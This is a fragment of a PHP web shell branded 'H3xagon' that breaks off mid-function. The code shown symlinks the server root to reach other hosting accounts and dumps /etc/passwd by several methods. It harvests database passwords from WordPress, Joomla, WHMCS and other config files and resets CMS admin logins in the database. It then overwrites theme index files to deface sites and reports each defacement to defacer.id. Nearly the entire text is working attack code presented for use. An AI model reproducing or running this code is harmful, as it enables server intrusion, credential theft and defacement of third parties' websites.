                                                                $r = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . "/h3xagon_symconf/";
                                                                $re = $r;
                                                                $confi = array("-Wordpress.txt", "-Joomla.txt", "-WHMCS.txt", "-Vbulletin.txt", "-Other.txt", "-Zencart.txt", "-Hostbills.txt", "-SMF.txt", "-Drupal.txt", "-OsCommerce.txt", "-MyBB.txt", "-PHPBB.txt", "-IPB.txt", "-BoxBilling.txt");
                                                                $users = file("/etc/passwd");
                                                                foreach ($users as $user) {
                                                                    $str = explode(":", $user);
                                                                    $usersss = $str[0];
                                                                    foreach ($confi as $co) {
                                                                        $uurl = $re . $usersss . $co;
                                                                        $uel = $uurl;
                                                                        $ch = curl_init();
                                                                        curl_setopt($ch, CURLOPT_URL, $uel);
                                                                        curl_setopt($ch, CURLOPT_HEADER, 1);
                                                                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                                        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                                                                        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
                                                                        $result['EXE'] = curl_exec($ch);
                                                                        curl_close($ch);
                                                                        $uxl = $result['EXE'];
                                                                        if ($uxl && preg_match('/table_prefix/i', $uxl)) {
                                                                            //Wordpress
                                                                            $dbp = entre2v2($uxl, "DB_PASSWORD', '", "');");
                                                                            if (!empty($dbp)) $pass = $dbp . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/cc_encryption_hash/i', $uxl)) {
                                                                            //WHMCS
                                                                            $dbp = entre2v2($uxl, "db_password = '", "';");
                                                                            if (!empty($dbp)) $pass = $dbp . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/dbprefix/i', $uxl)) {
                                                                            //Joomla
                                                                            $db = entre2v2($uxl, "password = '", "';");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/admincpdir/i', $uxl)) {
                                                                            //Vbulletin
                                                                            $db = entre2v2($uxl, "password'] = '", "';");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/DB_DATABASE/i', $uxl)) {
                                                                            //Other
                                                                            $db = entre2v2($uxl, "DB_PASSWORD', '", "');");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/dbpass/i', $uxl)) {
                                                                            //Other
                                                                            $db = entre2v2($uxl, "dbpass = '", "';");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/dbpass/i', $uxl)) {
                                                                            //Other
                                                                            $db = entre2v2($uxl, "dbpass = '", "';");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        } elseif ($uxl && preg_match('/dbpass/i', $uxl)) {
                                                                            //Other
                                                                            $db = entre2v2($uxl, "dbpass = \"", "\";");
                                                                            if (!empty($db)) $pass = $db . "
";
                                                                            fwrite($ffile, $pass);
                                                                        }
                                                                    }
                                                                }
                                                                echo "<center>
<a href=\"h3xagon_symconf/root/\">Root Server</a>
<br><a href=\"h3xagon_symconf/Passwords.txt\">Passwords</a>
<br><a href=\"h3xagon_symconf/\">Configurations</a></center>";
                                                            } else {
                                                                echo "<center>
<form method=\"POST\">
<textarea name=\"passwd\" class='area' rows='15' cols='60'>";
                                                                $file = '/etc/passwd';
                                                                $read = @fopen($file, 'r');
                                                                if ($read) {
                                                                    $body = @fread($read, @filesize($file));
                                                                    echo "" . htmlentities($body) . "";
                                                                } elseif (!$read) {
                                                                    $read = @show_source($file);
                                                                } elseif (!$read) {
                                                                    $read = @highlight_file($file);
                                                                } elseif (!$read) {
                                                                    for ($uid = 0;$uid < 1000;$uid++) {
                                                                        $ara = posix_getpwuid($uid);
                                                                        if (!empty($ara)) {
                                                                            while (list($key, $val) = each($ara)) {
                                                                                print "$val:";
                                                                            }
                                                                            print "
";
                                                                        }
                                                                    }
                                                                }
                                                                flush();
                                                                echo "</textarea>
<p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
</form></center>";
                                                            }
                                                        }
} elseif ($_GET['do'] == 'symlink') {
                                                                    @set_time_limit(0);
                                                                    echo "<br><br><center><h1>Symlink by H3xagon</h1></center><br><br><center><div class=content>";
                                                                    @mkdir('sym_kill', 0777);
                                                                    $htaccess = "Options all n DirectoryIndex h3xagon.htm n AddType text/plain .php n AddHandler server-parsed .php n  AddType text/plain .html n AddHandler txt .html n Require None n Satisfy Any";
                                                                    $write = @fopen('sym_kill/.htaccess', 'w');
                                                                    fwrite($write, $htaccess);
                                                                    @symlink('/', 'sym_kill/root');
                                                                    $filelocation = basename(__FILE__);
                                                                    $read_named_conf = @file('/etc/named.conf');
                                                                    if (!$read_named_conf) {
                                                                        echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
                                                                    } else {
                                                                        echo "<br><br><div class='tmp'><table border='1' bordercolor='blue' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>Symlink </td>";
                                                                        foreach ($read_named_conf as $subject) {
                                                                            if (eregi('zone', $subject)) {
                                                                                preg_match_all('#zone "(.*)"#', $subject, $string);
                                                                                flush();
                                                                                if (strlen(trim($string[1][0])) > 2) {
                                                                                    $UID = posix_getpwuid(@fileowner('/etc/valiases/' . $string[1][0]));
                                                                                    $name = $UID['name'];
                                                                                    @symlink('/', 'sym/root');
                                                                                    $name = $string[1][0];
                                                                                    $iran = '.ir';
                                                                                    $israel = '.il';
                                                                                    $indo = '.id';
                                                                                    $sg12 = '.sg';
                                                                                    $edu = '.edu';
                                                                                    $gov = '.gov';
                                                                                    $gose = '.go';
                                                                                    $gober = '.gob';
                                                                                    $mil1 = '.mil';
                                                                                    $mil2 = '.mi';
                                                                                    $malay = '.my';
                                                                                    $china = '.cn';
                                                                                    $japan = '.jp';
                                                                                    $austr = '.au';
                                                                                    $porn = '.xxx';
                                                                                    $as = '.uk';
                                                                                    $calfn = '.ca';
                                                                                    if (eregi("$iran", $string[1][0]) or eregi("$israel", $string[1][0]) or eregi("$indo", $string[1][0]) or eregi("$sg12", $string[1][0]) or eregi("$edu", $string[1][0]) or eregi("$gov", $string[1][0]) or eregi("$gose", $string[1][0]) or eregi("$gober", $string[1][0]) or eregi("$mil1", $string[1][0]) or eregi("$mil2", $string[1][0]) or eregi("$malay", $string[1][0]) or eregi("$china", $string[1][0]) or eregi("$japan", $string[1][0]) or eregi("$austr", $string[1][0]) or eregi("$porn", $string[1][0]) or eregi("$as", $string[1][0]) or eregi("$calfn", $string[1][0])) {
                                                                                        $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $string[1][0] . '</div>';
                                                                                    }
                                                                                    echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www." . $string[1][0] . '/>' . $name . ' </a> </div>
</td>

<td>
' . $UID['name'] . "
</td>

<td>
<a href='sym_kill/root/home/" . $UID['name'] . "/public_html' target='_blank'>Symlink </a>
</td>

</tr></div> ";
                                                                                    flush();
                                                                                }
                                                                            }
                                                                        }
                                                                    }
                                                                    echo "</center></table>";
} elseif ($_GET['do'] == 'symlink2') {
                                                        $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
                                                        $d0mains = @file("/etc/named.conf");
                                                        # .htaccess ini kk
                                                        if ($d0mains) {
                                                            @mkdir("h3xagon_sym", 0777);
                                                            @chdir("h3xagon_sym");
                                                            @exe("ln -s / root");
                                                            $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex h3xagon.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
                                                            $fp3 = fopen('.htaccess', 'w');
                                                            $fw3 = fwrite($fp3, $file3);
                                                            @fclose($fp3);
                                                            echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>";
                                                            $dcount = 1;
                                                            foreach ($d0mains as $d0main) {
                                                                if (eregi("zone", $d0main)) {
                                                                    preg_match_all('#zone "(.*)"#', $d0main, $domains);
                                                                    flush();
                                                                    if (strlen(trim($domains[1][0])) > 2) {
                                                                        $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
                                                                        echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>
<td>" . $user['name'] . "</td>
<td><a href='$full/h3xagon_sym/root/home/" . $user['name'] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
                                                                        flush();
                                                                        $dcount++;
                                                                    }
                                                                }
                                                            }
                                                            echo "</table>";
                                                        } else {
                                                            $TEST = @file('/etc/passwd');
                                                            if ($TEST) {
                                                                @mkdir("h3xagon_sym", 0777);
                                                                @chdir("h3xagon_sym");
                                                                exe("ln -s / root");
                                                                $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex h3xagon.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any';
                                                                $fp3 = fopen('.htaccess', 'w');
                                                                $fw3 = fwrite($fp3, $file3);
                                                                @fclose($fp3);
                                                                echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>S. No.</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
                                                                $dcount = 1;
                                                                $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
                                                                while (!feof($file)) {
                                                                    $s = fgets($file);
                                                                    $matches = array();
                                                                    $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
                                                                    $matches = str_replace("home/", "", $matches[1]);
                                                                    if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
                                                                    echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
                                                                    echo "<td align=center><font class=txt><a href=$full/h3xagon_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
                                                                    $dcount++;
                                                                }
                                                                fclose($file);
                                                                echo "</table>";
                                                            } else {
                                                                if ($os != "Windows") {
                                                                    @mkdir("h3xagon_sym", 0777);
                                                                    @chdir("h3xagon_sym");
                                                                    @exe("ln -s / root");
                                                                    $file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex h3xagon.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any
';
                                                                    $fp3 = fopen('.htaccess', 'w');
                                                                    $fw3 = fwrite($fp3, $file3);
                                                                    @fclose($fp3);
                                                                    echo "
 <div class='mybox'><h2 class='k2ll33d2'>Server Symlinker</h2>
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>";
                                                                    $temp = "";
                                                                    $val1 = 0;
                                                                    $val2 = 1000;
                                                                    for (;$val1 <= $val2;$val1++) {
                                                                        $uid = @posix_getpwuid($val1);
                                                                        if ($uid) $temp.= join(':', $uid) . "
";
                                                                    }
                                                                    echo '<br/>';
                                                                    $temp = trim($temp);
                                                                    $file5 = fopen("test.txt", "w");
                                                                    fputs($file5, $temp);
                                                                    fclose($file5);
                                                                    $dcount = 1;
                                                                    $file = fopen("test.txt", "r") or exit("Unable to open file!");
                                                                    while (!feof($file)) {
                                                                        $s = fgets($file);
                                                                        $matches = array();
                                                                        $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
                                                                        $matches = str_replace("home/", "", $matches[1]);
                                                                        if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue;
                                                                        echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>";
                                                                        echo "<td align=center><font class=txt><a href=$full/h3xagon_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
                                                                        $dcount++;
                                                                    }
                                                                    fclose($file);
                                                                    echo "</table></div></center>";
                                                                    unlink("test.txt");
                                                                } else echo "<center><font size=3>Cannot create Symlink</font></center>";
                                                            }
                                                        }
} elseif ($_GET['do'] == 'defacerid') {
                                                        echo "<center><form method='post'>
		<u>Defacer</u>: <br>
		<input type='text' name='hekel' size='50' value='H3xagon' placeholder='H3xagon'><br>
		<u>Team</u>: <br>
		<input type='text' name='tim' size='50' value='Cyber Merah Putih' placeholder='Cyber Merah Putih'><br>
		<u>Domains</u>: <br>
		<textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
		<input type='submit' name='go' value='Submit' style='width: 450px;'>
		</form>";
                                                        $site = explode("
", $_POST['sites']);
                                                        $go = $_POST['go'];
                                                        $hekel = $_POST['hekel'];
                                                        $tim = $_POST['tim'];
                                                        if ($go) {
                                                            foreach ($site as $sites) {
                                                                $zh = $sites;
                                                                $form_url = "https://www.defacer.id/notify";
                                                                $data_to_post = array();
                                                                $data_to_post['attacker'] = "$hekel";
                                                                $data_to_post['team'] = "$tim";
                                                                $data_to_post['poc'] = 'SQL Injection';
                                                                $data_to_post['url'] = "$zh";
                                                                $curl = curl_init();
                                                                curl_setopt($curl, CURLOPT_URL, $form_url);
                                                                curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post));
                                                                curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
                                                                curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post);
                                                                curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
                                                                curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
                                                                $result = curl_exec($curl);
                                                                echo $result;
                                                                curl_close($curl);
                                                                echo "<br>";
                                                            }
                                                        }
} elseif ($_GET['do'] == 'vhost') {
                                                        echo "<form method='POST' action=''>";
                                                        echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
                                                        echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
                                                        if (isset($_POST['Colii'])) {
                                                            system('ln -s / H3xagon.txt');
                                                            $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBoM3hhZ29uLmh0bQ0KQWRkVHlwZSB0eHQgLnBocA0KQWRkSGFuZGxlciB0eHQgLnBocA==';
                                                            $file = fopen(".htaccess", "w+");
                                                            $write = fwrite($file, base64_decode($fvckem));
                                                            $Bok3p = symlink("/", "H3xagon.txt");
                                                            $rt = "<br><a href=H3xagon.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
	Bypassed Successfully</b></font></a>";
                                                            echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";
                                                        }
                                                        echo "</form>";
} elseif ($_GET['do'] == 'passwbypass') {
                                                        echo '<center>Bypass etc/passw :<br>
<table style="width:50%">
  <tr>
    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
    <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>	
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>		
    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
</tr></table>Bypass User With : <table style="width:50%">
<tr>
    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>	
    <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>		
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
</tr>
</table><br>';
                                                        if ($_POST['awkuser']) {
                                                            echo "<textarea class='inputzbut' cols='65' rows='15'>";
                                                            echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
                                                            echo "</textarea><br>";
                                                        }
                                                        if ($_POST['systuser']) {
                                                            echo "<textarea class='inputzbut' cols='65' rows='15'>";
                                                            echo system("ls /var/mail");
                                                            echo "</textarea><br>";
                                                        }
                                                        if ($_POST['passthuser']) {
                                                            echo "<textarea class='inputzbut' cols='65' rows='15'>";
                                                            echo passthru("ls /var/mail");
                                                            echo "</textarea><br>";
                                                        }
                                                        if ($_POST['exuser']) {
                                                            echo "<textarea class='inputzbut' cols='65' rows='15'>";
                                                            echo exec("ls /var/mail");
                                                            echo "</textarea><br>";
                                                        }
                                                        if ($_POST['shexuser']) {
                                                            echo "<textarea class='inputzbut' cols='65' rows='15'>";
                                                            echo shell_exec("ls /var/mail");
                                                            echo "</textarea><br>";
                                                        }
                                                        if ($_POST['syst']) {
                                                            echo "<textarea class='inputz' cols='65' rows='15'>";
                                                            echo system("cat /etc/passwd");
                                                            echo "</textarea><br><br><b></b><br>";
                                                        }
                                                        if ($_POST['passth']) {
                                                            echo "<textarea class='inputz' cols='65' rows='15'>";
                                                            echo passthru("cat /etc/passwd");
                                                            echo "</textarea><br><br><b></b><br>";
                                                        }
                                                        if ($_POST['ex']) {
                                                            echo "<textarea class='inputz' cols='65' rows='15'>";
                                                            echo exec("cat /etc/passwd");
                                                            echo "</textarea><br><br><b></b><br>";
                                                        }
                                                        if ($_POST['shex']) {
                                                            echo "<textarea class='inputz' cols='65' rows='15'>";
                                                            echo shell_exec("cat /etc/passwd");
                                                            echo "</textarea><br><br><b></b><br>";
                                                        }
                                                        echo '<center>';
                                                        if ($_POST['melex']) {
                                                            echo "<textarea class='inputz' cols='65' rows='15'>";
                                                            for ($uid = 0;$uid < 60000;$uid++) {
                                                                $ara = posix_getpwuid($uid);
                                                                if (!empty($ara)) {
                                                                    while (list($key, $val) = each($ara)) {
                                                                        print "$val:";
                                                                    }
                                                                    print "
";
                                                                }
                                                            }
                                                            echo "</textarea><br><br>";
                                                        }
} elseif($_GET['do'] == 'indexing') {
	{error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0 = explode($marqueurDebutLien, $text);
                                                    $ar1 = explode($marqueurFinLien, $ar0[$i]);
                                                    return trim($ar1[0]);
                                                    }function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";
                                                    srand((double)microtime() * 1000000);
                                                    $i = 0;
                                                    $pass = '';
                                                    while ($i <= 7) {$num = rand() % 33;
                                                    $tmp = substr($chars, $num, 1);
                                                    $pass = $pass . $tmp;
                                                    $i++;
                                                    }return $pass;
                                                    }function index_changer_wp($conf, $content) {$output = '';
                                                    $dol = '$';
                                                    $go = 0;
                                                    $username = entre2v2($conf, "define('DB_USER', '", "');");
                                                    $password = entre2v2($conf, "define('DB_PASSWORD', '", "');");
                                                    $dbname = entre2v2($conf, "define('DB_NAME', '", "');");
                                                    $prefix = entre2v2($conf, $dol . "table_prefix  = '", "'");
                                                    $host = entre2v2($conf, "define('DB_HOST', '", "');");
                                                    $link = mysql_connect($host, $username, $password);
                                                    if ($link) {mysql_select_db($dbname, $link);
                                                    $dol = '$';
                                                    $req1 = mysql_query("UPDATE `" . $prefix . "users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
                                                    } else {$output.= "[-] DB Error<br />";
                                                    }if ($req1) {$req = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='home'");
                                                    $data = mysql_fetch_array($req);
                                                    $site_url = $data["option_value"];
                                                    $req = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='template'");
                                                    $data = mysql_fetch_array($req);
                                                    $template = $data["option_value"];
                                                    $req = mysql_query("SELECT * from  `" . $prefix . "options` WHERE option_name='current_theme'");
                                                    $data = mysql_fetch_array($req);
                                                    $current_theme = $data["option_value"];
                                                    $useragent = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
                                                    $url2 = $site_url . "/wp-login.php";
                                                    $ch = curl_init();
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
                                                    $buffer = curl_exec($ch);
                                                    $pos = strpos($buffer, "action=logout");
                                                    if ($pos === false) {$output.= "[-] Login Error<br />";
                                                    } else {$output.= "[+] Login Successful<br />";
                                                    $go = 1;
                                                    }if ($go) {$cond = 0;
                                                    $url2 = $site_url . "/wp-admin/theme-editor.php?file=/themes/" . $template . '/index.php&theme=' . urlencode($current_theme) . '&dir=theme';
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
                                                    $buffer0 = curl_exec($ch);
                                                    $_wpnonce = entre2v2($buffer0, '<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />');
                                                    $_file = entre2v2($buffer0, '<input type="hidden" name="file" value="', '" />');
                                                    if (substr_count($_file, "/index.php") != 0) {$output.= "[+] index.php loaded in Theme Editor<br />";
                                                    $url2 = $site_url . "/wp-admin/theme-editor.php";
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "newcontent=" . base64_decode($content) . "&action=update&file=" . $_file . "&_wpnonce=" . $_wpnonce . "&submit=Update File");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
                                                    $buffer = curl_exec($ch);
                                                    curl_close($ch);
                                                    $pos = strpos($buffer, '<div id="message" class="updated">');
                                                    if ($pos === false) {$output.= "[-] Updating Index.php Error<br />";
                                                    } else {$output.= "[+] Index.php Updated Successfuly<br />";
                                                    $hk = explode('public_html', $_file);
                                                    $output.= '[+] Deface ' . file_get_contents($site_url . str_replace('/blog', '', $hk[1]));
                                                    $cond = 1;
                                                    }} else {$url2 = $site_url . '/wp-admin/theme-editor.php?file=index.php&theme=' . $template;
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
                                                    $buffer0 = curl_exec($ch);
                                                    $_wpnonce = entre2v2($buffer0, '<input type="hidden" id="_wpnonce" name="_wpnonce" value="', '" />');
                                                    $_file = entre2v2($buffer0, '<input type="hidden" name="file" value="', '" />');
                                                    if (substr_count($_file, "index.php") != 0) {$output.= "[+] index.php loaded in Theme Editor<br />";
                                                    $url2 = $site_url . "/wp-admin/theme-editor.php";
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "newcontent=" . base64_decode($content) . "&action=update&file=" . $_file . "&theme=" . $template . "&_wpnonce=" . $_wpnonce . "&submit=Update File");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
                                                    $buffer = curl_exec($ch);
                                                    curl_close($ch);
                                                    $pos = strpos($buffer, '<div id="message" class="updated">');
                                                    if ($pos === false) {$output.= "[-] Updating Index.php Error<br />";
                                                    } else {$output.= "[+] Index.php Template Updated Successfuly<br />";
                                                    $output.= '[+] Deface ' . file_get_contents($site_url . '/wp-content/themes/' . $template . '/index.php');
                                                    $cond = 1;
                                                    }} else {$output.= "[-] index.php can not load in Theme Editor<br />";
                                                    }}}} else {$output.= "[-] DB Error<br />";
                                                    }global $base_path;
                                                    unlink($base_path . 'COOKIE.txt');
                                                    return array('cond' => $cond, 'output' => $output);
                                                    }function index_changer_joomla($conf, $content, $domain) {$doler = '$';
                                                    $username = entre2v2($conf, $doler . "user = '", "';");
                                                    $password = entre2v2($conf, $doler . "password = '", "';");
                                                    $dbname = entre2v2($conf, $doler . "db = '", "';");
                                                    $prefix = entre2v2($conf, $doler . "dbprefix = '", "';");
                                                    $host = entre2v2($conf, $doler . "host = '", "';");
                                                    $co = randomt();
                                                    $site_url = "http://" . $domain . "/administrator";
                                                    $output = '';
                                                    $cond = 0;
                                                    $link = mysql_connect($host, $username, $password);
                                                    if ($link) {mysql_select_db($dbname, $link);
                                                    $req1 = mysql_query("UPDATE `" . $prefix . "users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
                                                    $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '" . $prefix . "extensions'"));
                                                    } else {$output.= "[-] DB Error<br />";
                                                    }if ($req1) {if ($req) {$req = mysql_query("SELECT * from  `" . $prefix . "template_styles` WHERE `client_id` = '0' and `home` = '1'");
                                                    $data = mysql_fetch_array($req);
                                                    $template_name = $data["template"];
                                                    $req = mysql_query("SELECT * from  `" . $prefix . "extensions` WHERE `name`='" . $template_name . "' or `element` = '" . $template_name . "'");
                                                    $data = mysql_fetch_array($req);
                                                    $template_id = $data["extension_id"];
                                                    $url2 = $site_url . "/index.php";
                                                    $ch = curl_init();
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $return = entre2v2($buffer, '<input type="hidden" name="return" value="', '"');
                                                    $hidden = entre2v2($buffer, '<input type="hidden" name="', '" value="1"', 4);
                                                    if ($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);
                                                    curl_setopt($ch, CURLOPT_POST, 1);
                                                    curl_setopt($ch, CURLOPT_REFERER, $url2);
                                                    curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=" . $return . "&" . $hidden . "=1");
                                                    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                                                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                                    curl_setopt($ch, CURLOPT_HEADER, 0);
                                                    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
                                                    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
                                                    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
                                                    $buffer = curl_exec($ch);
                                                    $pos = strpos($buffer, "com_config");
                                                    if ($pos === false) {$output.= "[-] Login Error<br />";
                                                    } else {$output.= "[+] Login Successful<br />";
                                                    }}if ($pos) {$url2 = $site_url . "/index.php?option=com_templates&task=source.edit&id=" . base64_encode($template_id . ":index.php");
                                                    $ch = curl_init();
                                                    curl_setopt($ch, CURLOPT_URL, $url2);
